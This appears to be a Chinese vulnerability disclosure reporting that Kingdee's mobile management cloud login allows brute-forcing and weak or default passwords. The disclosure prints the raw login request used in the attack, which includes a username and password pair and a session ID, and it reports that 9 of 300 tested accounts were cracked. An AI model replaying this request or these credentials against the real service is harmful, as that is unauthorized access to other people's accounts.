VULHUB ™

### 简要描述： 如题，金蝶企业移动管理云暴力破解+弱口令，未加验证码和默认口令 ### 详细说明： 问题网址：http://mcloud.kingdee.com/mcloud/pages/ [<img src="https://images.seebug.org/upload/201505/04171113e7cb8b1352bfddfe59f57537412a006f.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/04171113e7cb8b1352bfddfe59f57537412a006f.jpg) ``` POST /mcloud/dwr/call/plaincall/custLoginService.login.dwr HTTP/1.1 Host: mcloud.kingdee.com Proxy-Connection: keep-alive Content-Length: 301 Origin: http://mcloud.kingdee.com User-Agent: Content-Type: text/plain Accept: */* Referer: http://mcloud.kingdee.com/mcloud/pages/ Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: JSESSIONID=w5u6heawhjdu1dt5et16a26sk callCount=1 page=/mcloud/pages/ httpSessionId=w5u6heawhjdu1dt5et16a26sk scriptSessionId=7EE1BE8590F1DDD3DC769322161A837A576 c0-scriptName=custLoginService c0-methodName=login c0-id=0 c0-e1=string:340727 c0-e2=string:340727...

### 简要描述： 如题，金蝶企业移动管理云暴力破解+弱口令，未加验证码和默认口令 ### 详细说明： 问题网址：http://mcloud.kingdee.com/mcloud/pages/ [<img src="https://images.seebug.org/upload/201505/04171113e7cb8b1352bfddfe59f57537412a006f.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/04171113e7cb8b1352bfddfe59f57537412a006f.jpg) ``` POST /mcloud/dwr/call/plaincall/custLoginService.login.dwr HTTP/1.1 Host: mcloud.kingdee.com Proxy-Connection: keep-alive Content-Length: 301 Origin: http://mcloud.kingdee.com User-Agent: Content-Type: text/plain Accept: */* Referer: http://mcloud.kingdee.com/mcloud/pages/ Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: JSESSIONID=w5u6heawhjdu1dt5et16a26sk callCount=1 page=/mcloud/pages/ httpSessionId=w5u6heawhjdu1dt5et16a26sk scriptSessionId=7EE1BE8590F1DDD3DC769322161A837A576 c0-scriptName=custLoginService c0-methodName=login c0-id=0 c0-e1=string:340727 c0-e2=string:340727 c0-param0=Object_Object:{user:reference:c0-e1, pwd:reference:c0-e2} batchId=0 ``` burp测试仅仅测试了300个账户就爆破了9个弱口令账户。如图 [<img src="https://images.seebug.org/upload/201505/0417090176c5bd06bcdc9ccfceeb69631388ae00.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/0417090176c5bd06bcdc9ccfceeb69631388ae00.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201505/041710383236b2fa73c9b8abebe36a3bc68bcf68.jpg" alt="捕获.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/041710383236b2fa73c9b8abebe36a3bc68bcf68.jpg)